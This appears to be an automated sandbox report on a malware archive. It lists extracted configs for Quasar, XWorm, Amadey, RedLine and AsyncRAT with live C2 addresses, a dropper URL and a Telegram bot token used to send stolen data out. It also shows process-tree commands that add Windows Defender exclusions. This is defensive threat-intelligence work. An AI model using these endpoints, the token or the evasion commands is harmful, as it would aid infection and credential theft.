amadey | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
37s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
21-05-2024 10:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Downloaders.zip
Size

12KB
MD5

94fe78dc42e3403d06477f995770733c
SHA1

ea6ba4a14bab2a976d62ea7ddd4940ec90560586
SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
SHA512

add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
SSDEEP

384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

185.196.10.233:4782

79.132.193.215:4782

Mutex

b0fcdfbd-bdd4-4a5d-8ab1-7217539d4db6

Attributes

encryption_key
0EC03133971030F6D05E6D59F71626F6543BBE65
install_name
gfdgfdg.exe
log_directory
Logs
reconnect_delay
3000
startup_key
fgfdhdgg
subdirectory
gfgfgf

Extracted

Family

xworm

Version

5.0

79.110.49.133:5700

5.182.87.154:7000

Mutex

Bg9JRZDpyEfXxrAy

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

amadey

Version

4.20

Botnet

c767c0

http://5.42.96.7

Attributes

install_dir
7af68cdb52
install_file
axplons.exe
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
url_paths
/zamo7h/index.php

rc4.plain

Extracted

Family

redline

Botnet

185.215.113.67:26260

Extracted

Family

xworm

127.0.0.1:7000

beshomandotestbesnd.run.place:7000

Attributes

Install_directory
%ProgramData%
install_file
taskmgr.exe
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672

Extracted

Family

redline

Botnet

Vic

beshomandotestbesnd.run.place:1111

Extracted

Family

redline

Botnet

@LOGSCLOUDYT_BOT

185.172.128.33:8970

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

5.182.87.154:4449

Mutex

jiqsvporltpvroy

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

127.0.0.1:8848

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Detect Lumma Stealer payload V2 1 IoCs

Processes:

resource yara_rule

C:\Users\Admin\Desktop\Files\crypted.exe family_lumma_V2
Detect Lumma Stealer payload V4 1 IoCs

Processes:

resource yara_rule

C:\Users\Admin\Desktop\Files\crypted.exe family_lumma_v4

resource	yara_rule
C:\Users\Admin\Desktop\Files\crypted.exe	family_lumma_V2

resource	yara_rule
C:\Users\Admin\Desktop\Files\crypted.exe	family_lumma_v4

Detect Xworm Payload 10 IoCs

Processes:

resource	yara_rule
behavioral1/memory/5948-222-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm
C:\ProgramData\system.exe	family_xworm
behavioral1/memory/5860-5088-0x0000000000820000-0x000000000083A000-memory.dmp	family_xworm
C:\Users\Admin\Desktop\a\msmng2.exe	family_xworm
behavioral1/memory/8720-7743-0x0000000000A20000-0x0000000000C40000-memory.dmp	family_xworm
behavioral1/memory/8044-8834-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm
C:\Users\Admin\Desktop\a\taskmgr.exe	family_xworm
behavioral1/memory/5728-11376-0x0000000000DD0000-0x0000000000E08000-memory.dmp	family_xworm
C:\Users\Admin\Desktop\a\Discord.exe	family_xworm
behavioral1/memory/8880-18532-0x00000000005B0000-0x00000000005C8000-memory.dmp	family_xworm

Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
PureLog Stealer
PureLog Stealer is an infostealer written in C#.
stealer purelogstealer

PureLog Stealer payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/8624-6786-0x00000216DC570000-0x00000216DC5BC000-memory.dmp	family_purelog_stealer
behavioral1/memory/8744-7402-0x0000000005470000-0x00000000054B8000-memory.dmp	family_purelog_stealer

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\Files\qausarneedscrypted.exe	family_quasar
behavioral1/memory/6024-164-0x0000000000360000-0x0000000000684000-memory.dmp	family_quasar
C:\Users\Admin\Desktop\a\client.exe	family_quasar
behavioral1/memory/8156-5036-0x00000000002A0000-0x00000000005C4000-memory.dmp	family_quasar

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
Raccoon Stealer V2 payload 1 IoCs

Processes:

resource yara_rule

C:\Users\Admin\Desktop\Files\2.3.1.1.exe family_raccoon_v2
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

resource	yara_rule
C:\Users\Admin\Desktop\Files\2.3.1.1.exe	family_raccoon_v2

RedLine payload 6 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe	family_redline
C:\ProgramData\build.exe	family_redline
behavioral1/memory/6196-5439-0x0000000000FE0000-0x0000000001032000-memory.dmp	family_redline
behavioral1/memory/7280-5696-0x0000000000E50000-0x0000000000E6E000-memory.dmp	family_redline
behavioral1/memory/4252-5806-0x00000000008A0000-0x00000000008F2000-memory.dmp	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat
SectopRAT payload 2 IoCs

Processes:

resource yara_rule

C:\ProgramData\build.exe family_sectoprat
behavioral1/memory/7280-5696-0x0000000000E50000-0x0000000000E6E000-memory.dmp family_sectoprat
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

resource	yara_rule
C:\ProgramData\build.exe	family_sectoprat
behavioral1/memory/7280-5696-0x0000000000E50000-0x0000000000E6E000-memory.dmp	family_sectoprat

Windows security bypass 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

Specificationsfdp..exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	Specificationsfdp..exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Desktop\a\Specificationsfdp..exe = "0"	Specificationsfdp..exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Async RAT payload 1 IoCs
rat

Processes:

resource yara_rule

C:\Users\Admin\Desktop\a\my.exe family_asyncrat
Warzone RAT payload 1 IoCs
rat

Processes:

resource yara_rule

C:\Users\Admin\Desktop\a\WinSec.exe warzonerat

resource	yara_rule
C:\Users\Admin\Desktop\a\my.exe	family_asyncrat

resource	yara_rule
C:\Users\Admin\Desktop\a\WinSec.exe	warzonerat

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
6980	powershell.exe
3556	powershell.exe
7016	powershell.exe
3216	powershell.exe
8768	powershell.exe
6636	powershell.exe
8284	powershell.exe
4716	powershell.exe
5928	powershell.exe
5960	powershell.exe
6948	powershell.exe
1652	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource yara_rule

behavioral1/memory/7972-4215-0x0000000004B10000-0x0000000004B74000-memory.dmp net_reactor
behavioral1/memory/7972-4152-0x0000000004A90000-0x0000000004AF6000-memory.dmp net_reactor

resource	yara_rule
behavioral1/memory/7972-4215-0x0000000004B10000-0x0000000004B74000-memory.dmp	net_reactor
behavioral1/memory/7972-4152-0x0000000004A90000-0x0000000004AF6000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

New Text Document mod.exe4363463463464363463463463.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	4363463463464363463463463.exe

Executes dropped EXE 17 IoCs

Processes:

New Text Document mod.execrt.execrt.tmp4363463463464363463463463.exemaxpad32.exemaxpad32.execrypted.exewsms.exe4363463463464363463463463.execp.exeSpecificationsfdp..exeNew Text Document mod.exeqausarneedscrypted.exeInvoicesbv..exexlxssxlx..exeSpecssbv..exefile.exe

pid	process
5048	New Text Document mod.exe
3788	crt.exe
4644	crt.tmp
2868	4363463463464363463463463.exe
5316	maxpad32.exe
5372	maxpad32.exe
5484	crypted.exe
5552	wsms.exe
5560	4363463463464363463463463.exe
5740	cp.exe
5876	Specificationsfdp..exe
5952	New Text Document mod.exe
6024	qausarneedscrypted.exe
6112	Invoicesbv..exe
5224	xlxssxlx..exe
5712	Specssbv..exe
5844	file.exe

Loads dropped DLL 1 IoCs

Processes:

crt.tmp

pid process

4644 crt.tmp
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
4644	crt.tmp

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

Specificationsfdp..exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	Specificationsfdp..exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions	Specificationsfdp..exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Desktop\a\Specificationsfdp..exe = "0"	Specificationsfdp..exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service
T1102

Processes:

flow ioc

55 bitbucket.org
80 bitbucket.org
582 raw.githubusercontent.com
584 raw.githubusercontent.com
588 raw.githubusercontent.com
46 bitbucket.org
47 bitbucket.org
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

418 ip-api.com
465 ip-api.com
620 api.ipify.org
623 api.ipify.org
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

crypted.exe

pid process

5484 crypted.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

6564 sc.exe
7580 sc.exe
5728 sc.exe
6308 sc.exe
5864 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
55	bitbucket.org
80	bitbucket.org
582	raw.githubusercontent.com
584	raw.githubusercontent.com
588	raw.githubusercontent.com
46	bitbucket.org
47	bitbucket.org

flow	ioc
418	ip-api.com
465	ip-api.com
620	api.ipify.org
623	api.ipify.org

pid	process
5484	crypted.exe

pid	process
6564	sc.exe
7580	sc.exe
5728	sc.exe
6308	sc.exe
5864	sc.exe

Program crash 8 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5544	5844	WerFault.exe	file.exe
6708	7972	WerFault.exe	ReurgingGleek.exe
180	8044	WerFault.exe	msfiler.exe
3640	9076	WerFault.exe	nine.exe
384	9076	WerFault.exe	nine.exe
6172	2588	WerFault.exe	ghjkl.exe
3640	3556	WerFault.exe	powershell.exe
7916	9076	WerFault.exe	nine.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

8024 schtasks.exe
6832 schtasks.exe
8656 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

7884 taskkill.exe
3344 taskkill.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

taskmgr.exe

pid process

5340 taskmgr.exe
5340 taskmgr.exe
5340 taskmgr.exe
5340 taskmgr.exe
5340 taskmgr.exe

pid	process
8024	schtasks.exe
6832	schtasks.exe
8656	schtasks.exe

pid	process
7884	taskkill.exe
3344	taskkill.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

7zG.exe7zG.exe7zG.exeNew Text Document mod.exe4363463463464363463463463.execrypted.exe4363463463464363463463463.exeqausarneedscrypted.exeNew Text Document mod.exetaskmgr.exe

description	pid	process
Token: SeRestorePrivilege	3812	7zG.exe
Token: 35	3812	7zG.exe
Token: SeSecurityPrivilege	3812	7zG.exe
Token: SeSecurityPrivilege	3812	7zG.exe
Token: SeRestorePrivilege	3028	7zG.exe
Token: 35	3028	7zG.exe
Token: SeSecurityPrivilege	3028	7zG.exe
Token: SeSecurityPrivilege	3028	7zG.exe
Token: SeRestorePrivilege	4024	7zG.exe
Token: 35	4024	7zG.exe
Token: SeSecurityPrivilege	4024	7zG.exe
Token: SeSecurityPrivilege	4024	7zG.exe
Token: SeDebugPrivilege	5048	New Text Document mod.exe
Token: SeDebugPrivilege	2868	4363463463464363463463463.exe
Token: SeLoadDriverPrivilege	5484	crypted.exe
Token: SeDebugPrivilege	5560	4363463463464363463463463.exe
Token: SeDebugPrivilege	6024	qausarneedscrypted.exe
Token: SeDebugPrivilege	5952	New Text Document mod.exe
Token: SeDebugPrivilege	5340	taskmgr.exe
Token: SeSystemProfilePrivilege	5340	taskmgr.exe
Token: SeCreateGlobalPrivilege	5340	taskmgr.exe

Suspicious use of FindShellTrayWindow 20 IoCs

Processes:

7zG.exe7zG.exe7zG.execrt.tmptaskmgr.exe

pid	process
3812	7zG.exe
3028	7zG.exe
4024	7zG.exe
4644	crt.tmp
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe

Suspicious use of SendNotifyMessage 16 IoCs

Processes:

taskmgr.exe

pid	process
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe
5340	taskmgr.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

crypted.execp.exe

pid process

5484 crypted.exe
5740 cp.exe

pid	process
5484	crypted.exe
5740	cp.exe

Suspicious use of WriteProcessMemory 34 IoCs

Processes:

New Text Document mod.execrt.execrt.tmp4363463463464363463463463.exe

description	pid	process	target process
PID 5048 wrote to memory of 3788	5048	New Text Document mod.exe	crt.exe
PID 5048 wrote to memory of 3788	5048	New Text Document mod.exe	crt.exe
PID 5048 wrote to memory of 3788	5048	New Text Document mod.exe	crt.exe
PID 3788 wrote to memory of 4644	3788	crt.exe	crt.tmp
PID 3788 wrote to memory of 4644	3788	crt.exe	crt.tmp
PID 3788 wrote to memory of 4644	3788	crt.exe	crt.tmp
PID 4644 wrote to memory of 5316	4644	crt.tmp	maxpad32.exe
PID 4644 wrote to memory of 5316	4644	crt.tmp	maxpad32.exe
PID 4644 wrote to memory of 5316	4644	crt.tmp	maxpad32.exe
PID 4644 wrote to memory of 5372	4644	crt.tmp	maxpad32.exe
PID 4644 wrote to memory of 5372	4644	crt.tmp	maxpad32.exe
PID 4644 wrote to memory of 5372	4644	crt.tmp	maxpad32.exe
PID 2868 wrote to memory of 5484	2868	4363463463464363463463463.exe	crypted.exe
PID 2868 wrote to memory of 5484	2868	4363463463464363463463463.exe	crypted.exe
PID 2868 wrote to memory of 5484	2868	4363463463464363463463463.exe	crypted.exe
PID 5048 wrote to memory of 5552	5048	New Text Document mod.exe	wsms.exe
PID 5048 wrote to memory of 5552	5048	New Text Document mod.exe	wsms.exe
PID 5048 wrote to memory of 5552	5048	New Text Document mod.exe	wsms.exe
PID 2868 wrote to memory of 5740	2868	4363463463464363463463463.exe	cp.exe
PID 2868 wrote to memory of 5740	2868	4363463463464363463463463.exe	cp.exe
PID 2868 wrote to memory of 5740	2868	4363463463464363463463463.exe	cp.exe
PID 5048 wrote to memory of 5876	5048	New Text Document mod.exe	Specificationsfdp..exe
PID 5048 wrote to memory of 5876	5048	New Text Document mod.exe	Specificationsfdp..exe
PID 2868 wrote to memory of 6024	2868	4363463463464363463463463.exe	qausarneedscrypted.exe
PID 2868 wrote to memory of 6024	2868	4363463463464363463463463.exe	qausarneedscrypted.exe
PID 5048 wrote to memory of 6112	5048	New Text Document mod.exe	Invoicesbv..exe
PID 5048 wrote to memory of 6112	5048	New Text Document mod.exe	Invoicesbv..exe
PID 5048 wrote to memory of 5224	5048	New Text Document mod.exe	xlxssxlx..exe
PID 5048 wrote to memory of 5224	5048	New Text Document mod.exe	xlxssxlx..exe
PID 5048 wrote to memory of 5712	5048	New Text Document mod.exe	Specssbv..exe
PID 5048 wrote to memory of 5712	5048	New Text Document mod.exe	Specssbv..exe
PID 5048 wrote to memory of 5844	5048	New Text Document mod.exe	file.exe
PID 5048 wrote to memory of 5844	5048	New Text Document mod.exe	file.exe
PID 5048 wrote to memory of 5844	5048	New Text Document mod.exe	file.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Downloaders.zip
1⤵
PID:3132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=2700,i,14648456027158448592,4956305794400220180,262144 --variations-seed-version --mojo-platform-channel-handle=3684 /prefetch:8
1⤵
PID:2136

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5016

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap20012:80:7zEvent31661
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3812

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap32512:108:7zEvent19953
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3028

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap14084:110:7zEvent30285
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4024

C:\Users\Admin\Desktop\New Text Document mod.exe
"C:\Users\Admin\Desktop\New Text Document mod.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5048

C:\Users\Admin\Desktop\a\crt.exe
"C:\Users\Admin\Desktop\a\crt.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3788

C:\Users\Admin\AppData\Local\Temp\is-OHPBN.tmp\crt.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OHPBN.tmp\crt.tmp" /SL5="$40362,4505283,54272,C:\Users\Admin\Desktop\a\crt.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4644

C:\Users\Admin\AppData\Local\MaxPad\maxpad32.exe
"C:\Users\Admin\AppData\Local\MaxPad\maxpad32.exe" -i
4⤵
- Executes dropped EXE
PID:5316

C:\Users\Admin\AppData\Local\MaxPad\maxpad32.exe
"C:\Users\Admin\AppData\Local\MaxPad\maxpad32.exe" -s
4⤵
- Executes dropped EXE
PID:5372

C:\Users\Admin\Desktop\a\wsms.exe
"C:\Users\Admin\Desktop\a\wsms.exe"
2⤵
- Executes dropped EXE
PID:5552

C:\Users\Admin\Desktop\a\wsms.exe
"C:\Users\Admin\Desktop\a\wsms.exe"
3⤵
PID:6916

C:\Users\Admin\Desktop\a\Specificationsfdp..exe
"C:\Users\Admin\Desktop\a\Specificationsfdp..exe"
2⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:5876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\Specificationsfdp..exe" -Force
3⤵
- Command and Scripting Interpreter: PowerShell
PID:5928

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
3⤵
PID:5948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
3⤵
PID:6012

C:\Users\Admin\Desktop\a\Invoicesbv..exe
"C:\Users\Admin\Desktop\a\Invoicesbv..exe"
2⤵
- Executes dropped EXE
PID:6112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\Invoicesbv..exe" -Force
3⤵
- Command and Scripting Interpreter: PowerShell
PID:5960

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
3⤵
PID:5780

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
3⤵
PID:5984

C:\Users\Admin\Desktop\a\xlxssxlx..exe
"C:\Users\Admin\Desktop\a\xlxssxlx..exe"
2⤵
- Executes dropped EXE
PID:5224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\xlxssxlx..exe" -Force
3⤵
- Command and Scripting Interpreter: PowerShell
PID:7016

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
3⤵
PID:2344

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
3⤵
PID:5544

C:\Users\Admin\Desktop\a\Specssbv..exe
"C:\Users\Admin\Desktop\a\Specssbv..exe"
2⤵
- Executes dropped EXE
PID:5712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\Specssbv..exe" -Force
3⤵
- Command and Scripting Interpreter: PowerShell
PID:6980

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
3⤵
PID:6408

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
3⤵
PID:6776

C:\Users\Admin\Desktop\a\file.exe
"C:\Users\Admin\Desktop\a\file.exe"
2⤵
- Executes dropped EXE
PID:5844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5844 -s 352
3⤵
- Program crash
PID:5544

C:\Users\Admin\Desktop\a\oiii.exe
"C:\Users\Admin\Desktop\a\oiii.exe"
2⤵
PID:5728

C:\Users\Admin\Desktop\a\123.exe
"C:\Users\Admin\Desktop\a\123.exe"
2⤵
PID:6884

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:7060

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\delete.bat" "
4⤵
PID:8612

C:\Users\Admin\Desktop\a\random.exe
"C:\Users\Admin\Desktop\a\random.exe"
2⤵
PID:7132

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
3⤵
PID:7328

C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
"C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
4⤵
PID:7940

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:8112

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
6⤵
PID:4252

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
6⤵
PID:4920

C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
4⤵
PID:6196

C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
"C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
4⤵
PID:2076

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
5⤵
PID:4200

C:\Windows\SysWOW64\sc.exe
Sc stop GameServerClient
6⤵
- Launches sc.exe
PID:5864

C:\Program Files (x86)\GameSyncLink\GameService.exe
GameService remove GameServerClient confirm
6⤵
PID:9160

C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\swizzzz.exe"
4⤵
PID:5052

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:4224

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
PID:8616

C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
"C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
4⤵
PID:5396

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
5⤵
PID:7760

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
5⤵
PID:6804

C:\Users\Admin\AppData\Local\Temp\1000065001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000065001\gold.exe"
4⤵
PID:7652

